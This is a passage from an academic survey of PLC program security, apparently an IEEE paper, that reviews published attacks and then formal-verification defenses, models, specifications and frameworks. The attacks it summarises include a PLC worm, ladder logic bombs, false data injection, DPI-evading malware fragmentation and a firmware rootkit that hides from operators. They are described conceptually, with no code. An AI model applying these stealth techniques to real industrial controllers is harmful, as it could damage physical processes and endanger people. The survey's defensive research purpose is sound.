PLC-Blaster worm Senthi vel 18 [83] W4 GI1 active ES ES,PLC LD, AB/RsLogix PyShark, decompiler Laddis CLIK [54] W4 GI1 both ES PLC IL,Schneider Eupheus decompilation Beresford 11 [11] W4,5 GI2 both N/A ES,PLC Siemens S7 Wireshark, Metasploit Lim 17 [64] W4,5 GI4,GA active ES ES,PLC Tricon PLC LabV iew, PXI Chassis, Scapy Xiao 16 [92] W4 GI4 both State verif. Sensor , PLC generic N/A Abbasi 16 [3] W4 GI2 both Others N/A Codesys-based Codesys platform Yoo 19 [94] W5 GI1 both Others ES,PLC Schneider/AB DPI and detection tools LLB [43] W4,6 GI1,GI2 both Programmer ES,PLC LD, AB Studio 5000, RSLinx, LLB CaFDI [69] W4 GI4 both State verif. N/A generic CaFDIT3runtime HAR VEY [37] W4,5 GI4,GC both ES ES,PLC AB Hex, dis-assembler, EMS Engineering Station (ES), Allen-Bradley (AB). Tools: vulnerability (vul.). Detection to evade: veri cation (verif.). trolled process, so that modi ed binaries could deploy meaningful and impactful attacks. 4.1.3. T3: program runtime. At this level, existing studies investigated two types of attacks: the program modi cation attack, and the program input manipulationattack. The input of the program could either come fromthe communication between the PLC and the engineeringstation, or the sensor readings. Program modi cation attack. this requires reverse engineering and payload injection, similar to studies inT2. The difference is that, given the PLC memory lay-out available, and the features supported by the PLC,the design of payload becomes more targeted. Throughinjecting malicious payload to the code, PLCInject [58]and PLC-Blaster [85] presented the widespread impactof the malicious payload. PLCInject crafted a payloadwith a scanner and proxy. Due to the prede ned memorylayout of Siemens Simatic PLCs, PLCInject injected thispayload at the rst organization block (OB) to change theinitialization of the system. This attack turned the PLCinto a gateway of the network of PLCs. Using PLCIn-ject, Spenneberg [85] implemented a worm, PLC-Blaster,that can spread among the PLCs. PLC-Blaster spread byreplicating itself and modifying the target PLCs to executeit along with the already installed programs. PLC-Blasteradopted several anti-detection mechanisms, such as avoid-ing the anti-replay byte, storing at a less used block, andmeeting the scan cycle limit. PLCInject and PLC-Blasterachieved G3and demonstrated the widespread impact of program injection attacks. In addition to that, Senthivel et.al [83] introduced several malicious payloads that could deceive the engi-neering station. Since the engineering station periodicallychecks the running program from the PLC, the attackerscould deceive it by providing an uninfected program whilekeep executing the infected program in the PLC. Sen-thivel achieved this through a self-developed decompiler(laddis) for LD programs. Senthivel also introduced threestrategies to achieve this denial of engineering operationattacks. In a similar setting, Kalle et.al [54] presented CLIK. After payload injection, CLIK implemented a virtual PLC,which simulated the network traf c of the uninfected PLC,and fed this traf c to the engineering station to deceivethe operators. These two works employed a full chain ofvulnerabilities at the network level, without accessing theengineering station nor the PLCs. Input manipulation through the network. several studies [11], [64] hijacked certain network packets be-tween the engineering station and a PLC. Beresford et.al [11] exploited a packet (e.g. ISO-TSAP) between thePLC and the engineering station. These packets providedprogram information, such as variable names, data blocknames, and also the PLC vendor and model. Attackerscould modify these variables to cause undesired behavior.With memory probing techniques, attackers could get amapping between these names to the variables in the PLC.This would allow them to modify the program based onneeds. This attack could cause damages to the physicalprocesses. However, the chance for successful mappingof the variables through memory probing is small. In anuclear power plant setting, Lim et.al [64] intercepted and modi ed the command-37 packets sent between theengineering station and the PLC. This packet providedinput to an industrial-grade PLC consisted of redundantmodules for recovery. The attack caused common-modefailures for all the modules. These attacks made the entry point through the net- work traf c. However, they ignored the fact that securitysolutions could have enabled deep packet inspection (DPI)between the PLC and the engineering station. Modi edpackets with malicious code or input data could have beendetected before reaching the PLC. To evade DPI, Yooet.al [94], [95] presented stealthy malware transmission, by splitting the malware into small fragments and trans-mitting one byte per packet with a large size of noises.This is because DPI merges packets for detection and thuswas not able to detect small size payload. On the PLCside, Yoo leveraged a vulnerability to control the receivedmalicious payload, discard the padded noises, and con g-ure the start address for execution. Although dependenton multiple vulnerabilities, this study provided insight forstealthy program modi cation and input manipulation atthe network level. Input manipulation through sensor. existing studies [3], [43], [69], [92] explored different approaches to evadevarious behavior detection, and to achieve G1. 390 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. Govil et.al [43] presented Ladder logic bombs (LLB), which was a combination of program injection and input manipulation attacks. The malicious payload was injectedinto the existing LD program, as a subroutine, and couldbe triggered by a certain condition. Once triggered, thismalware could replace legitimate sensor readings withmanipulated values. LLB was designed to evade manualinspection, by giving instructions names similar to com-monly used ones. LLB did not consider behavior detection, such as state veri cation, or state estimation. To counter B uchi automaton based state estimation, CaFDI [69] introducedcontroller-aware false data injection attacks. CaFDI re-quired high-level information of the physical processes,and monitored I/O traces of the program. It rst con-structed a B uchi automaton model of the program based on its I/O traces, and then searched for a set of inputsthat may cause the model to produce the desired mali-cious behavior. CaFDI calculated the Cartesian productof the safe model and the unsafe model, and recursivelysearched for a path that could satisfy the unsafe modelin the formalization. The resulting path of input wouldbe used as the sensor readings for the program. To staystealthy, CaFDI avoided noticeable inputs, such as an LEDindicator. Xiao [92] ne tuned the undesired model toevade existing sequence-based fault detection [57]. Anattacker could rst construct a discrete event model fromthe collected fault-free I/O traces using non-deterministicautonomous automation with output (NDAAO), and thenbuild a word set of NDAAO sequences, and nally, searchfor the undetectable false sequences from the word set toinject into the compromised sensors. Similarly, by com-bining the control ow of the program, Abbasi et.al [3] presented con guration manipulation attacks by exploitingcertain pin control operations, leveraging the absence ofhardware interrupts associated to the pins. To evade the general engineering operations, Garcia [37] developed HARVEY , a PLC rootkit at the rmwarelevel that can evade operators viewing the HMI. HAR-VEY faked sensor input to the control logic to generateadversarial commands, while simulated the legitimate con-trol commands that an operator would expect to see. Inthis way, HARVEY could maximize the damage to thephysical power equipment and cause large-scale failures,without operators noticing the attack. HARVEY assumedaccess to the PLC rmware, which was less monitoredthan the control logic program. These studies make it practical to inject malicious payloads either through a compromised network or in-secure sensor con gurations. Because of the stealthiness,it remains challenging to design security solutions tocounter. The following details the challenges. 4.2. Challenges Expanded attack input surfaces. The attack input surfaces for PLC programs are expanding. The aforemen-tioned studies have shown input sources including (1) thecommunication from the engineering station, with certainpackets intercepted and hijacked, (2) internet faced PLCsin the same subnet, and (3) compromised sensors and rmware. It becomes challenging for defense solutions toscope an appropriate threat model, since any componentalong the chain of control could be compromised. Prede ned hierarchical memory layout. Multiple studies leveraged this weakness to perform the attacks.However, traditional defense solutions [22] have seenmany challenges: (1) the address space layout randomiza-tion (ASLR) would be too heavy to meet the scan cycle re-quirements for the PLCs, and would still suffer from code-reuse attacks, (2) control ow integrity based solutionsrequire a substantial amount of memory, and would behard to detect in real-time, or to mitigate the attacks, and(3) the hierarchical memory layout is vendor-speci c, andthe attacks targeting them are product-driven, for example,Siemens Simatic S7 [11], [85]. It is challenging to designa lightweight and generalized defense solution. Con dentiality and integrity of the program I/O. The majority of the studies depended on the program I/Oto perform attacks, either to extract information of thephysical processes, and possible detection methods, or tomanipulate input to produce unsafe behaviors. ProtectingI/O is challenging in that (1) the input surfaces of the pro-grams are expanding, (2) sensors and physical processescould be public infrastructure, and (3) the I/O has to beupdated frequently to meet the scan cycle requirement. Stealthy attack detection. We have mentioned many stealthiness strategies based on different threat models, in-cluding (1) disguising malicious code as human errors, (2)code obfuscation with fragmentation and noise padding toevade DPI, (3) crafting input to evade state estimationand veri cation algorithms, (4) using speci c memoryblock or con guration of the PLC, and (5) deceivingthe engineering station with faked legit behaviors. It ischallenging for a defense solution to capture these stealthyattacks. Implicit or incomplete speci cations. Multiple stud- ies have shown crafted attacks using the implicit properties[68] [70]. The dif culties of de ning precise and com-plete speci cations lie in that (1) product requirementsmay change over time thus requiring update of semanticson inputs and outputs, (2) limited expressiveness can leadto incompleteness, while over expressiveness may lead toimplicitness, and (3) domain-speci c knowledge is usuallyneeded. It is challenging to design speci cations thatovercome these dif culties. 5. Formal Veri cation based Defenses A large body of research uses formal veri cation for PLC safety and security, as Table 3shows. This study mainly focused on the following aspects: Behavior Modeling: Modeling the behavior of theprogram as a state-based, ow-oriented, or time-dependent representation. State Reduction: Reducing the state space to im-prove search ef ciency. Speci cation Generation: Generating the speci -cation with desired properties as a temporal logicformula. Veri cation: Applying model checking or theoremproving algorithms to verify the security or safety ofthe PLC program. 391 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. Based on these aspects, the following discusses de- fense methodologies. We use the same threat models, security goals, and weaknesses as mentioned in Section3.2. 5.1. Behavior Modeling The goal of behavior modeling is to obtain a formal representation of the PLC program behavior, so that givena speci cation, a formal veri cation framework can un-derstand and verify it. The following discusses behaviormodeling, based on different threat models. 5.1.1. T1: program source code. At the source code level, a line of studies [4], [30], [41], [76] have investi- gated the formal modeling of generic program behaviors.The majority of them translated programs to automata and Petri nets, since they were well supported by most formalveri cation frameworks [4]. These translations usuallyconsider each program unit as an automaton, includingthe main program, functions, and function block instances.Each variable de ned in the program unit was translated asa corresponding variable in the automaton. Input variablesare assigned non-deterministically at the beginning of eachPLC cycle. The whole program was modeled as a network of automata , where a transition represents the changes of variable values in different execution cycles, and asynchronization pair represents synchronized transitions of function calls. In a similar modeling method, Newellet.al [76] translated FBD programs to Prototype Veri ca- tion System (PVS) models, since certain nuclear powergenerating station can only support such representation. These studies could formally model most PLC behav- iors, especially the internal logic within the PLC code.However, with only source code available, behavior mod-eling lacks the interaction with the PLC hardware, and thephysical processes, which might cause unsafe or maliciousbehaviors to bypass later formal veri cation. The follow-ing discusses behavior modeling with more informationavailable. 5.1.2. T2: program bytecode/binary. Fewer studies have investigated behavior modeling at the program binary level. The challenges lie in reverse engineering. As men-tioned in existing works [71], [100], several PLC featuresare not supported in the normal instruction sets. PLCs aredesigned with hierarchical addressing using a dedicatedmemory area for the input and output buffers. The functionblocks use a parameter list with xed entry and exit points.PLCs also support timers that act differently between bit-logic instructions and arithmetic instructions. Thanks to an open-source library [60], which can disassemble Siemens PLC binary programs into STL (ILequivalent for Siemense) programs, several works [21],[71], [93], [100] studied modeling Siemens binary pro-grams. Based on the STL program, TSV [71] leveragedan intermediate language, ILIL, to allow more completeinstruction modeling. With concolic execution, TSV ob-tained the information ow from the system registersand the memory. After executing multiple scan cycles,a temporal execution graph was constructed to representthe states of the controller code. After TSV , Zonouz et.al [100] adopted the same modeling. Chang et.al [21] andXie et.al [93] constructed control ow graphs with similar executable paths. Chang deduced the output states ofthe timer based on the existing output state transitionrelationships, while Xie used constraints to model theprogram. Combined with studies at T1, these studies could handle more temporal features, such as varied scan cyclelengths, and enabled input dependent behavior model-ing. With control ow based representation, nested logicand pointers could also be supported. However, withoutconcrete execution of the programs, the drawbacks areobvious: (1) the input vectors were either random or haveto be manually chosen, (2) the number of symbolic stateslimited the program sizes, (3) the temporal informationfurther increased resource consumption. Next, we discussbehavior modeling with runtime information. 5.1.3. T3: program runtime. With runtime information, existing research [19], [53], [65], [98], [99] modeled pro- grams considering its interactions with the physical pro-cesses, the supervisor, and the operator tasks. This allowedmore realistic modeling for timing sensitive instructions,and domain-speci c behavior modeling. Automated frameworks [91], [99] were presented to model PLC behaviors with interrupt scheduling, functioncalls, and IO traces. Zhou et.al [99] adopted an environ- ment module for the inputs and outputs, an interruptionmodule for time-based instructions, and a coordinatormodule to schedule these two modules with the mainprogram. Wang et.al [91] automated a BIP (Behavior, Interaction, Priority) framework to formalize the scanningmode, the interrupt scheduler, and the function calls. Mesliet.al [72] presented a component-based modeling for the whole control-command chain, with each component de-scribed as timed automata. To automate modeling of domain-speci c event behav- ior, VetPLC [98] generated timed event causality graphs(TECG) from the program, and the runtime data traces.The TECG maintained temporal dependencies constrainedby machine operations. These studies removed the barrier from modeling event-driven and domain-speci c behaviors. They couldmitigate attacks violating security and safety requirementsvia special sequences of valid logic. 5.1.4. Challenges. Lack of plant modeling. Galvao et.al [36]h a v e pointed out the importance of plant models in formal veri cation. However, existing studies focused on theformalization of PLC programs, rather than the I/O of theprograms that directly re ect the behavior of the physicalprocesses (e.g. plant). Under T3, a few studies considered program I/O during behavior modeling. However, theyeither consider I/O as a generic module working togetherwith the other modules [91], [99], or informally use datamining on program I/O to extract program event sequences[98]. It remains challenging to formalize plant models inimproving PLC program security. Lack of modeling evaluation. The majority of the studies only adopted one modeling method to obtain aprogram representation. We understood the representationis compatible with the formal veri cation framework. 392 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. However, there were no scienti c comparisons between models from different studies, except some high-leveldescriptions. Within one model, only a few studies [ 20], [69], [98] evaluated the number of states in their rep-resentations. It is even more dif cult to understand theperformance of the model from the security perspective. State explosion. The aforementioned studies have already adopted an ef cient representation that transformsa program unit as a state automaton, and formalizes thestate transition between the current cycle and the next cy-cle. A less ef cient model representation transforms eachvariable of a program as a state, and formalize the transi-tion between the states. Even though such representationcan bene t PLC programs in any language, it produceslarge size models containing too many states to be veri ed,even for small and medium-sized programs. Therefore, inpractice, most of the programs are modeled in the formeref cient representation. For large size programs, however,both representations will produce large amounts of statecombinations, causing the state explosion problem. Thefollowing describes research works in state reduction. 5.2. State Reduction The goal of state reduction is to improve the scalability and complexity of PLC program formalization. There aretwo common steps involved. First, we have to determinethe meaningful states related to safety and security prop-erties. Then, we trim the less meaningful states. 5.2.1. T1: program source code. At the source code level, a line of studies [25], [29], [42], [79] performed state reduction. Gourcuff et.al [42] considered the meaningful states as those related to the input and output variables,since they directly control the behavior of the physicalprocesses. To obtain the dependency relations of the in-put and output variables, Gourcuff conducted static codeanalysis to get variable dependencies in a ST program,and found a large portion of the unrelated states. Eventhough this method signi cantly reduced the state searchspace, it also skipped much of the original code for thefollowing veri cation. To improve the code coverage of the formalization, Pavlovic et.al [79] presented a general solution for FBD programs. They rst transformed the graphical programto textual statements in textFBD, and further substituted the circuit variables to tFBD. This approach removed the unnecessary assignments connecting continuous state-ments and merged them into one. On top of this ap-proach, Darvas et.al ne tuned the reduction heuristicswith a more complete representation [ 25], [29]. Besides unnecessary variable or logic elimination, these heuristicsadopted the Cone of in uence (COI)-based reduction, andthe rule-based reduction. The COI-based reduction rstremoved unconditional states that all possible executionsgo through. It then removed variables that do not in uencethe evaluation of the speci cation. The rule-based reduc-tion could be speci ed based on the safety requirements ofthe application domain. Additionally, math models werealso used to abstract different components. Newell et.al [76] de ned additional structure, attribute maps, graphs,and block groups to reduce the state space of their PVScode.These studies successfully reduced the size of program states. They were limited, however, to basic Boolean rep-resentation reduction. For programs with complex time-related variables, function blocks, or multitasks, thesestudies were insuf cient. It was also unclear whether thereduction could undermine program security. The fol-lowing discusses other reduction techniques when suchinformation is present. 5.2.2. T2: program bytecode/binary. Studies at the bi- nary level mostly adopted symbolic execution combined with ow-based representation. This demonstrated thatmeaningful states lead to different symbolic output vec-tors. TSV [71] merged the input states that could all leadto the same output values. It also abstracted the temporalexecution graphs, by removing the symbolic variablesbased on their product with the valuations of the LTLproperties. To further reduce the unrelated states, Chang et.al [21] reduced the overlapping output states of the samescan cycle, and removed the output states that had beenanalyzed in previous cycles. To reduce the overhead oftimer modeling, they employed a deduction method for theoutput states of timers, through the analysis of the existingoutput state transition relationships These reductions didnot undermine the goal of detecting malicious behaviorsspanning multiple cycles. Compared with T1, these studies were more interested in preserving temporal features, and targeted the reduc-tion from random inputs in symbolic execution. However,without undermining the temporal feature modeling, thereduction of input states was inef cient given the lack ofreal inputs. The following discusses the reduction tech-niques when runtime inputs are available. 5.2.3. T3: program runtime. With runtime information, we could gain a better understanding of the real mean- ingful states. These include the knowledge from eventscheduling for subroutine and interrupts, and the realinputs and outputs from the domain-speci c processes. Existing studies [53], [65], [98], [99] presented state reduction in different approaches. To reduce the scale ofthe model, Zhou et.al [99] modeled timers inline with the main program instead of a separate automata, since theirmodel had considered the real environment traces, theinterruptions, and the scheduling between them. Similarly,Wang et.al [91] compressed segments without jump and call instructions into one transition. Besides merging unnecessary states, the real inputs and domain-speci c knowledge could narrow down therange for modeling numerical and oat variables. InZhang s study [98], continuous timing behavior was dis-cretized to multiple time slices with a constant interval.Since the application-speci c IO traces are available, thetime interval was narrowed to a range balancing betweenef ciency and precision. Compared with studies at T1and T2, state reduction atT3was more powerful, not only with more realistic temporal and event-driven features supported, but alsohelped to extract more meaningful states with domain-speci c runtime information. 5.2.4. Challenges. 393 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. Lack of ground truth for continuous behavior. We discussed that runtime traces helped to determine a realistic granularity for continuous behaviors. However,choosing the granularity was still experience-based andad-hoc. In fact, a too coarse granularity would fail todetect actual attacks, while a too ne granularity expectedinfeasible attack scenarios [36]. Abstracting a groundtruth model for continuous behavior remains challenging. Implicitness and stealthy attacks from reduction. Although existing studies have considered property preser-vation, the reduced unrelated states may underminePLC security. We mentioned in Section 4that implicit speci cation had led to attacks. The reduced states maycause the implicit mapping between the variables in theprogram and its speci cation, or they may contain stealthybehaviors that were simply omitted by the speci cation.The following discusses research on speci cation genera-tion. 5.3. Speci cation Generation The goal of these studies is to generate safety and security speci cations with formal semantics. Specify-ing precise and complete desired properties is dif cult.Existing studies focused on two aspects: (1) process-independent properties that describe the overall require-ments for a control system, and (2) domain-speci c prop-erties that require domain expertise. 5.3.1. T1: program source code. At the source code level, a line of studies [13], [27], [28], [41], [47] inves- tigated speci cation generation with process-independentproperties. These properties include avoiding variablelocks, avoiding unreachable operating modes, operatingmodes that are mutually exclusive, and avoiding irrelevantlogic [81]. Existing studies [4], [10], [16], [74], [81] usually adopted CTL or LTL-based formulas to express theseproperties. LTL describes the future of paths, e.g., a con-dition will eventually be true, a condition will be true untilanother fact becomes true, etc. CTL describes invariance and reachability, e.g., the system never leaves the set of states, the system can reach the set of states, respectively.Other variants included ACTL, adopted by Rawlings [81],and ptLTL, adopted by Biallas [12]. Besides CTL and LTL-based formulas, a proof assis- tantwas also investigated to assist the development of for- mal proofs. To formally de ne the syntax and semantics,Biha et.al [13] used a type theory based proof assistant, Coq, to de ne the safety properties for IL programs. Thesemantics concentrated on the formalization of on-delaytimers, using discrete time with a xed interval. BesidesCoq, K framework [47] was also adopted to provide aformal operational semantics for ST programs. K is arewriting-based semantic framework that has been appliedin de ning the semantics for C and Java. Compared withCoq, K is less formal but lighter and easier to read andunderstand. The trade-off is that manual effort is requiredto ensure the formality of the de nition. These studies limited speci cation generation to cer- tain program models. To enable formal semantics for state-based, data- ow-oriented, and time-dependent programmodels, Darvas et.al [27] presented PLCspecif to support various models. These studies provided opportunities for engineers lacking formalism expertise to generate formal and preciserequirements. The proof assistant frameworks even al-lowed generating directly executable programs, e.g. C pro-gram. Nevertheless, only process-independent propertiescould be automated, the following discusses speci cationgeneration with more information available. 5.3.2. T2: program bytecode/binary. As mentioned ear- lier, symbolic execution allowed these studies to support program modeling with numeric and oat variables. Thesevariables provided more room for property de nitions inthe speci cation. TSV [71] de ned properties boundingthe numerical device parameters, such as the maximumdrive velocity and acceleration. Others et.al [21], [93], [100] de ned properties to detect malicious code injection,parameter tampering attacks. Xie et.al [93] expanded the properties to detect stealthy attacks, and denial of serviceattacks. Similar to studies at T1, these studies all adopted LTL- based formalism, and could automate process-independentproperty generation. To accommodate certain attack strate-gies, the speci cation generation was manually de ned. 5.3.3. T3: program runtime. With runtime information available, speci cation generation concentrated more on domain-speci c properties. In a waste water treatmentplant setting, Luccarini et.al [65] applied arti cial neural networks to extract qualitative patterns from the continu-ous signals of the water, such as the pH and the dissolvedoxygen. These qualitative patterns were then mapped tothe control events in the physical processes. The mappingwas logged using XML and translated into formal rulesfor the speci cation. This approach considered the col-lected input and output traces as ground truth for securityand safety properties, and removed the dependencies ondomain expertise. In reality, the runtime traces might be polluted, or contain incomplete properties for veri cation. To ensurethe correctness and completeness of domain-speci c rules,existing studies [36], [98] also considered semi-automated approaches, which combined automated data mining andmanual domain expertise. VetPLC [98] formally de nedthe safety properties, through automatic data mining andevent extraction, aided with domain expertise in craftingsafety speci cations. VetPLC adopted timed propositionaltemporal logic (TPTL), which was more suitable to quan-titatively express safety speci cations. Besides (semi)-automated speci cation generation, Mesli et.al [72] manually de ned a set of rules for the interaction between each component along the chain ofcontrol. The requirements are also written in CTL tempo-ral logic. To assist domain experts in developing formalrules, Wang et.al [91] formalized the semantics for a BIP model for all types of PLC programs. It automatedprocess-independent rules for interrupts, such as, follow-ing the rst come rst serve principle. These studies enabled speci cation generation with domain-speci c knowledge. They thus expanded securityresearch with more concentration on safety requirements. 394 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. 5.3.4. Challenges. Lack of speci cation-re ned programming. Since these studies already assumed the existence of the PLC programs (source code or binary), the generated speci -cation could help re ne the programming and programmodeling. We have mentioned earlier that state reductionconsidered property preserving, and removed irrelevantlogic from program modeling. However, generated prop-erties did not provide direct feedback to the programsource code. In fact, program re nement in a similarapproach of state reduction is promising in eliminatingirrelevant stealthy code from the source. Ad-hoc and unveri ed speci cation translations. Despite the availability of formal semantics and proofassistants, such as Coq, PVS, HOL, existing require-ments are informally de ned in high-level languages, andvary across industrial domains. Existing studies translat-ing these requirements encountered many challenges: (1)tradeoff between an automated but unveri ed approach,or a formal but manual rewriting, (2) the dependencies onprogram language (many studies were based on IL [47],deprecated in IEC 61131-3 since 2013), (3) the rules werebased on sample programs without the complexity of thereal industry. Barrier for automated domain-speci c property generation. Although Luccarini [65] presented a promis- ing approach, it was based on two unrealistic assump-tions: (1) the trace collected from the physical processeswas complete and could be trusted, and (2) the learningalgorithm extracted the rules completely and accurately.Without further proofs (manual domain expertise) to liftthese two assumptions, the extracted properties wouldbe an incomplete white list which may also containimplicitness, leading to false positives or true negativesin the veri cation or detection. Speci cation generation with evolved system de- sign. Increasing requirements were laid on PLC programs, considering the interactions from new components. In thebehavior modeling, we have observed studies formalizingthe behaviors of new interactions, on top of existed mod-els, for example, adding a scheduler module combing anexisted program with a new component. Compared withthat, we saw fewer studies investigating incremental spec-i cation generation, based on existing properties. It wasstill challenging to de ne the properties to synchronizePLC programs with various components, especially in atiming-sensitive fashion. 5.4. Veri cation We already discussed the modeling of program be- havior, and speci cation generation. With these, a line ofstudies [9], [10], [16], [17], [20], [74], [75], [77], [80],[81], [96] applied model checking and theorem provingto verify the safety and security of the programs. These studies applied several formal veri cation frameworks, summarized in Table 2. The majority of them used Uppaal and Cadence SMV . Uppaal was usedfor real-time veri cation representing a network of timedautomata extended with integer variables, structured datatypes, and channel synchronization. Cadence SMV wasused for untimed veri cation. 5.4.1. T1: program source code. At the source code level, formal veri cation studies aimed at verifying weak- nesses W1-W4, to defend against general safety problems. They had been applied by programs from different indus-tries. To defend G1, Bender et.al [10] adopted model check- ing for LD programs modeled as timed Petri nets. Theyapplied model checkers in the Tina toolkit to verify LTLproperties. Bauer et.al [9] adopted Cadence SMV and Uppaal, to verify untimed modeling and timed modelingof the SFC programs, respectively. They identi ed errorsfrom three reactors. Similarly, Niang et.al [77] veri ed a circuit breaker program in SFC using Uppaal, based on arecipe book speci cation. To defend G2, Hailesellasie et.al [44] applied Uppaal and compared two formally generatedattributed graphs, the Golden Model with the properties, and a random model formalized from a PLC program. Theveri cation is based on the comparison of nodes and edgesof the graphs. They detected stealthy code injections. Instead of adopting existing tools, several studies developed their own frameworks for veri cation. Ar-cade.PLC [12] supported model checking with CTL andLTL-based properties for all types of PLC programs.PLCverif [28] supported programs from all ve SiemensPLC languages. NuDE 2.0 [56] provided formal-method-based software development, veri cation and safety anal-ysis for nuclear industries. Rawlings et.al [81] applied symbolic model checking tools st2smv and SynthSMV toverify and falsify a ST program controlling batch reactorsystems. They automatically veri ed process-independentproperties, rooted in W1-W4. Besides model checking, existing studies [76] also adopted PVS theorem proving to verify the safety prop-erties described in tabular expressions in a railway inter-locking system. These studies are limited to general safety require- ments veri cation. To defend G2and G3, more informa- tion will be needed, as discussed in the following. 5.4.2. T2: program bytecode/binary. This line of studies [21], [71], [91], [93], [100] allowed us to detect binary tampering attacks. TSV [71] combined symbolic execution and model checking. It fed the model checker with an abstracted temporal execution graph, with its manually crafted LTL-based safety property. Due to its support for random timervalues within one cycle, TSV was limited by checkingthe code with timer operations, and still suffered fromstate explosion problems. Xie et.al [93] mitigated this problem with the use of constraints in verifying randominput signals. Xie used nuXmv model checker. Chang et.al [21] applied a less formal veri cation based on the numberof states. These studies successfully detected malicious parame- ter tempering attacks, based on sample programs control-ling traf c lights, elevator, water tank, stirrer, and sewageinjector. 5.4.3. T3: program runtime. With runtime information, existing studies could verify domain-speci c safety and 395 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. security issues, namely all the weaknesses and security goals discussed in Section 4. To defend G1by considering the interactions to the program, Carlsson et.al [18] applied NuSMV to verify the interaction between the Open Platform Communica-tions (OPC) interface and the program, using propertiesde ned as server/client states. They detected synchroniza-tion problems, such as jitter, delay, race condition, andslow sampling caused by the OPC interface. Mesli [72]applied Uppaal to multi-layer timed automata, based ona set of safety and usability properties written in CTL.They detected synchronization errors between the controlprograms and the supervision interfaces. To fully leverage the knowledge from the physical processes, VetPLC [98] combined runtime traces, andapplied BUILDTSEQS to verify security properties de- ned in timed propositional temporal logic. HyPLC [ 38] applied theorem prover KeYmaera X to verify the proper-ties de ned in differential dynamic logic. Different fromVetPLC, HyPLC aimed at a bi-directional veri cationbetween the physical processes, and the PLC program,to detect safety violations. These studies either assumed an of ine veri cation, or vaguely mentioned using a supervisory componentfor online veri cation. To provide an online veri cationframework, Garcia et.al [40] presented an on-device run- time solution to detect control logic corruption. Theyleveraged an embedded hypervisor within the PLC, withmore computational power and integration of direct libraryfunction calls. The hypervisor overcame the dif cultiesof strict timing requirements and limited resources, andallowed veri cation to be enforced within each scan cycle. 5.4.4. Challenges. Lack of benchmarks for formal veri cation. Similar to the challenges in behavior modeling, an ideal evaluation should be multi-dimensional: across modeling methods,across veri cation methods, and based on a set of bench-mark programs. Existing evaluations, if performed, werelimited to one dimension and based on at most a few sam-ple programs. These programs were often vendor-speci c,test-case driven, and failed to re ect the real industry com-plexity. Without a representative benchmark and concreteevaluation, the security solution design would still be ad-hoc. Open-source automated veri cation frameworks. Existing studies have presented several open-sourceframeworks taking a PLC program as input, and automati-cally generating the formal veri cation result over genericproperties. These frameworks (e.g. Arcade.PLC, st2smvand the SynSMV) lowered the bar for security analy-sis using formal veri cation. However, over the years,such frameworks were no longer supported. No compara-ble replacement emerged, except PLCverif [26] targetingSiemens programs. High demand for runtime veri cation. The chal- lenges include (1) expanded attack landscapes due toincreasingly complex networking, (2) tradeoff betweenlimited available resources on the PLC and real-timeconstraints, (3) runtime injected stealthy attacks due toinsecure communication, and (4) runtime denial of serviceattacks omitted by existing studies.6. Recommendations We have described and discussed the security chal- lenges in defending against PLC program attacks usingformal veri cation and analysis. Next, we offer recom-mendations to overcome these challenges. Our recom-mendations highlight promising research paths based ona thorough analysis of the state-of-the-art and the currentchallenges. We consider these recommendations equallyrelevant regardless of any particular factor neither men-tioned nor considered in this section that may changethis perception. 6.1. Program Modeling 6.1.1. Plant Modeling. We discussed the lack of formal- ized plant modeling in Section 5.1.4. We recommend more research in plant modeling to formalize more accurateand complete program behaviors. Future research shouldconsider re nement techniques to de ne the granularityand level of abstraction for the plant models and theproperties to verify. The re nement techniques shouldconsider the avoidance of state explosion, by extractingfeasible conditions of the plant that can trigger propertyviolations in the program. 6.1.2. Input manipulation veri cation. Plant modeling is also promising in mitigating program input manipula- tion attacks. As mentioned in Section 4, input manipula- tion is widely adopted by the attackers. Future researchshould consider the Orpheus [23] prototype in a PLCsetting. Orpheus performs event consistency checking be-tween the program model and the plant model to detectinput manipulation attacks. To perform event consistencychecking in a PLC, future research may consider in-strumentation on the input and output variables of theprograms, and compare the values with these from theplant models. 6.2. State Reduction In Section 4.1.1, we discussed code level attacks that could disguise themselves as bad coding practice, and arehard to be noticed. During the state reduction, based onan existed speci cation, unrelated states are trimmed toavoid state explosion problems. However, as mentionedin Section 4.2, existing studies failed to investigate the relationship between the unrelated states and the orig-inal program. It could be hidden jumps with a stealthylogger to leak program critical information. The speci ca-tion might only consider the noticeable unsafe behaviors,which can disturb the physical processes, while let thestates from the stealthy code be recognized as unrelated .We, therefore, recommend future research to investigatethe security validation of unrelated code, and considerautomatic program cleaning for the stealthy code. 6.3. Speci cation Generation 6.3.1. Domain-speci c property de nition. As men- tioned in Section 5.3.4, there are barriers in automatic generation of domain-speci c properties, and manually 396 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. TABLE 2: Common frameworks for formal veri cation Frameworks Modeling LanguagesProperty Languages/ProverSupported Veri cation Techniques NuSMV/nuXMV SMV input language (BDD) CTL, LTL SMT, Model checking, fairness requirements Uppaal Timed automata with clock and data variables TCTL subset Time-related, and probability related properties Cadence SMV SMV input language (BDD) CTL, LTL Temporal logic properties of nite state systems SPIN Promela LTL Model checking UMC UML UCTL Functional properties of service-oriented systems Coq Gallina (Calculus of Inductive Constructions) Vernacular Theorem proof assistant PVS PVS language (typed higher-order logic) Primitive inference Formal speci cation, veri cation and theorem prover Z3 SMT-LIB2 SMT-LIB2 Theories Theorem prover TABLE 3: Existing studies using formal veri cation to detect control logic attacks Thr eat ModelPaperSecurity GoalDefense FocusVeri cation TechniquesPropertyPLC LanguageTools Adie go 15 [4] GI1 BM, SG MC CTL, LTL ST,SFC nuXmv , PLCVerif, Xtext, UNICOS Bauer 04 [9] GI1,GI3 FV MC CTL SFC Cadence SMV , Uppaal Bender 08 [10] GI3 SG, FV MC seLTL LD Tina Toolkit Biallas 12 [12] GI1,GI3 SG, FV MC CTL, ptLTL generic PLCopen, 